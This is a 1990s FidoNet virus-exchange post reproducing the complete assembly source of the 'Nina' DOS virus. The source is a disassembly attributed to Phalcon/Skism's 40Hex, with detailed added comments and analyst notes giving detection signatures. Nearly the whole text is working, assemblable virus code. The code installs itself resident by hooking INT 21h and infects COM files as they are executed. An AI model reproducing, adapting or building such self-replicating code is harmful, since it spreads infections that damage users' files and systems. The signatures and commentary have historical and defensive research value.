;─ PVT.VIRII (2:465/65.4) ─────────────────────────────────────────────── PVT.VIRII ─
; Msg : 35 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : NINA.ASM
;──────────────────────────────────────────────────────────────────────────────
;.RealName: Max Ivanov
;═══════════════════════════════════════════════════════════════════════════════
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: Инфоpмация о виpусах)
;* From : Daniel Hendry, 2:283/718 (06 Nov 94 17:37)
;* To : Viral Doctor
;* Subj : NINA.ASM
;═══════════════════════════════════════════════════════════════════════════════
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Daniel.Hendry@f718.n283.z2.fidonet.org
; Syntax note: this is MASM/TASM-style source (.model, org, offset, ptr,
; 'dw ?'), whatever the hosting page's language label says.
; Tiny model, COM image: one segment, loaded at PSP:100h. The size and
; offset constants used below (start+10h, the 100h-byte copies and writes,
; cs:[0F2h]) all depend on that load address.
.model tiny
.code
org 100h
; Disassembly done by Dark Angel of Phalcon/Skism
; for 40Hex Number 9, Volume 2 Issue 5
;-----------------------------------------------------------------------
; start — entry of an infected COM file, executing at PSP:100h.
; 1. Resident check: AX=9753h on INT 21h. A resident copy answers by
;    never returning here (its hook goes exit_install -> return_COM);
;    without a resident copy DOS simply returns.
; 2. DS is pointed at the program's own MCB (PSP-1) to read the block
;    size, the block is shrunk by 40h paragraphs and 3Fh paragraphs are
;    allocated; neither DOS call is checked for carry.
; 3. The 100h-byte body at PSP:100h (= MCB:110h) is copied to the new
;    block and execution continues at highentry there, with CS chosen so
;    the 100h-based offsets still line up.
; Pushed and left on the stack for highentry/return_COM: AX, BX, ES.
; Analyst note: every infected file starts with this prologue, so the
; bytes 50h B8h 53h 97h (push ax / mov ax,9753h) plus the 'Nina' string
; near the end of the body identify it statically; infect itself keys on
; the word 9753h at file offset 2.
;-----------------------------------------------------------------------
start:
push ax ; AX as the loader handed it over; popped again in return_COM
mov ax,9753h ; installation check
int 21h ; a resident copy diverts this call (see int21 / exit_install)
mov ax,ds
dec ax
mov ds,ax ; ds->program MCB (one paragraph below the PSP)
mov ax,ds:[3] ; get size word (MCB+3 = block length in paragraphs)
push bx
push es ; ES (PSP segment) comes back into DS in highentry
sub ax,40h ; reserve 40h paragraphs
mov bx,ax
mov ah,4Ah ; Shrink memory allocation (ES = block to resize); carry not checked
int 21h

mov ah,48h ; Allocate 3Fh paragraphs
mov bx,3Fh ; for the virus; AX = segment on return, carry not checked
int 21h

mov es,ax ; copy virus to high
xor di,di ; memory
mov si,offset start + 10h ; start at MCB:110h
mov cx,100h ; (same as PSP:100h); the body is assumed to be exactly 100h bytes
rep movsb
sub ax,10h ; adjust offset as if it
push ax ; originated at 100h: CS = block-10h, so block:0 is CS:100h
mov ax,offset highentry
push ax
retf ; far jump into the copy via the two pushes above
endfile dw 100h ; size of infected COM file
;-----------------------------------------------------------------------
; highentry — runs in the freshly allocated block (CS = block-10h).
; Marks the block's MCB as owned by someone else so DOS keeps it after the
; host exits, saves the current INT 21h vector into oldint21 (completing
; the far jmp at exitint21), moves the original handler to INT 91h (the
; virus calls DOS through it), and points INT 21h at int21. Then restores
; DS/BX from the stack left by start and falls into return_COM.
; return_COM — also the target of exit_install. Expects DS = ES = host PSP
; and the host's saved AX on top of the stack. Copies the host's original
; first 100h bytes (kept at file offset endfile, i.e. PSP:100h+endfile)
; back over PSP:100h and far-returns to PSP:100h to run the host.
; Exit is a retf, not iret: on the exit_install path the flags the host's
; 'int 21h' pushed are discarded, not restored.
;-----------------------------------------------------------------------
highentry:
mov byte ptr cs:[0F2h],0AAh ; change MCB's owner so the
; memory isn't freed when the
; program terminates
; (CS:0F2h = (block-1):2, the high byte of the MCB owner field,
; so the owner no longer matches any live PSP)
mov ax,3521h ; get int 21h vector
int 21h ; returns ES:BX

mov word ptr cs:oldint21,bx ; save it
mov word ptr cs:oldint21+2,es
push es
pop ds
mov dx,bx
mov ax,2591h ; redirect int 91h to int 21h (DS:DX = original handler)
int 21h

push cs
pop ds
mov dx,offset int21
mov al,21h ; set int 21h to virus vector (relies on AH still being 25h)
int 21h

pop ds ; ds->original program PSP (the ES pushed in start)
pop bx
push ds
pop es
return_COM:
mov di,100h ; restore original
mov si,endfile ; file (DS = host PSP: the host image's endfile, not the resident one)
add si,di ; adjust for COM starting
mov cx,100h ; offset
rep movsb ; PSP:100h+endfile -> PSP:100h
pop ax ; the AX pushed first thing in start
push ds ; jmp back to original
mov bp,100h ; file (PSP:100)
push bp
retf ; far jump to DS:100h
;-----------------------------------------------------------------------
; exit_install — taken by the int21 hook when a newly started infected
; program asks "are you there?" (AX=9753h) and a copy is already resident.
; Still executing inside the INT 21h hook on the host's stack: the three
; pops discard the interrupt frame (IP, CS, FLAGS) that the host's
; 'int 21h' pushed, leaving the host's 'push ax' on top, then control
; continues at return_COM, which restores and runs the host without a
; second installation. The interrupt is never IRETed.
;-----------------------------------------------------------------------
exit_install:
pop ax ; pop CS:IP and flags in
pop ax ; order to balance the
pop ax ; stack and then exit the
jmp short return_COM ; infected COM file
;-----------------------------------------------------------------------
; int21 — resident INT 21h hook.
; AX=9753h: installation check -> exit_install (does not return to caller).
; AX=4B00h: EXEC load-and-run; DS:DX = ASCIIZ path of the program about to
;           start -> infect it, restore registers, fall through.
; Anything else: far jmp to the original handler through the 0EAh opcode
; followed by oldint21 (filled in by highentry), so the original handler
; IRETs directly to the caller and nothing runs on the way back.
; infect and its helpers touch only AX, BX, CX, DX, DS (and flags); those
; are the registers saved here. ES, SI, DI are untouched.
; Analyst note: in memory, INT 21h points into a 3Fh-paragraph block whose
; MCB owner byte was patched to 0AAh, and INT 91h holds what INT 21h held
; before infection.
;-----------------------------------------------------------------------
int21:
cmp ax,9753h ; installation check?
je exit_install
cmp ax,4B00h ; execute?
jne exitint21 ; nope, quit
push ax ; save registers
push bx
push cx
push dx
push ds
call infect ; DS:DX still the caller's filename
pop ds ; restore registers
pop dx
pop cx
pop bx
pop ax
exitint21:
db 0eah ; jmp far ptr
oldint21 dd ? ; operand of that jmp: original INT 21h vector (offset:segment)
;-----------------------------------------------------------------------
; infect — try to infect the file named by DS:DX (from the EXEC call).
; DOS is reached via INT 91h (the original INT 21h) so this hook is not
; re-entered. Sequence:
;   open read/write (3D02h); carry -> exit_infect without closing
;   read the first 100h bytes into the buffer at endvirus (DS = CS);
;     the read's AX/carry is not examined
;   skip EXE files: both byte orders of the MZ signature are compared
;   skip files already carrying the word 9753h at offset 2
;   seek to end (AL=2) to get the size in AX; accept only
;     1F4h <= size <= 0FEB0h (unsigned compares: ja/jb)
;   store size in endfile, append the saved header (write takes DS:DX =
;     endvirus, which move_file_pointer preserved)
;   seek to start, overwrite the first 100h bytes with the body at DS:100h
; Resulting file: [body 100h][host from 100h on][host's first 100h bytes].
; Clobbers AX, BX, CX, DX, DS. The handle is closed on every path except
; an open failure. The host is only reassembled in memory, at run time,
; by return_COM.
;-----------------------------------------------------------------------
infect:
mov ax,3D02h ; open file read/write
int 91h
jc exit_infect
mov bx,ax ; handle
mov cx,100h
push cs
pop ds ; DS = resident segment for the buffer and body addresses
mov ah,3Fh ; Read first 100h bytes
mov dx,offset endvirus
int 91h
mov ax,word ptr endvirus
cmp ax,'MZ' ; exit if EXE
je close_exit_infect
cmp ax,'ZM' ; exit if EXE
je close_exit_infect
cmp word ptr endvirus+2,9753h ; exit if already
je close_exit_infect ; infected (the immediate of 'mov ax,9753h' in the prologue)
mov al,2 ; go to end of file
call move_file_pointer ; AX = file size (low word)
cmp ax,0FEB0h ; exit if too large
ja close_exit_infect
cmp ax,1F4h ; or too small for
jb close_exit_infect ; infection
mov endfile,ax ; save file size
call write ; DS:DX = endvirus: append the host's first 100h bytes
mov al,0 ; go to start of file
call move_file_pointer
mov dx,100h ; write virus
call write ; 100h bytes from DS:100h = the body
close_exit_infect:
mov ah,3Eh ; Close file
int 91h
exit_infect:
retn
;-----------------------------------------------------------------------
; move_file_pointer — LSEEK (AH=42h) on handle BX to offset 0 relative to
; the origin the caller placed in AL (0 = start, 2 = end are used here).
; Out: AX = low word of the resulting position (the high word DOS returns
; in DX is lost because DX is restored from the stack). CX = 0.
; DX is preserved so the caller's buffer pointer survives the call.
;-----------------------------------------------------------------------
move_file_pointer:
push dx
xor cx,cx
xor dx,dx ; CX:DX = 0
mov ah,42h
int 91h
pop dx
retn
;-----------------------------------------------------------------------
; write — WRITE (AH=40h) 100h bytes from DS:DX to handle BX via INT 91h.
; AL is left as it was (function 40h ignores it). Returns AX = bytes
; written / carry on error; no caller examines either.
;-----------------------------------------------------------------------
write:
mov ah,40h
mov cx,100h
int 91h
retn
; 'Nina' — the name string and, with the 9753h word at offset 2, the static
; marker of the body; presumably also sized so that endvirus lands exactly
; 100h bytes past start, since every copy and write of the body uses
; CX=100h (nothing in the source checks this).
db 'Nina'
; endvirus — end of the 100h-byte body. In the resident copy the 100h bytes
; from here on are the I/O buffer infect reads the host's header into.
; In this carrier the "host" is just 'int 20h' (terminate); return_COM
; copies it to PSP:100h because endfile = 100h puts it at 100h+100h.
endvirus:
int 20h ; original COM file
end start
;-+- Terminate 1.50/Pro
; + Origin: Rampton Birds' Box, +358-31-3564751, 28.800bps, 24h (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; ■ The Me┬eO
;
;/yx Extended memory swapping
;
;--- Aidstest Null: /Kill
; * Origin: ∙PVT.ViRII·main·board· / Virus Research labs. (2:5030/136)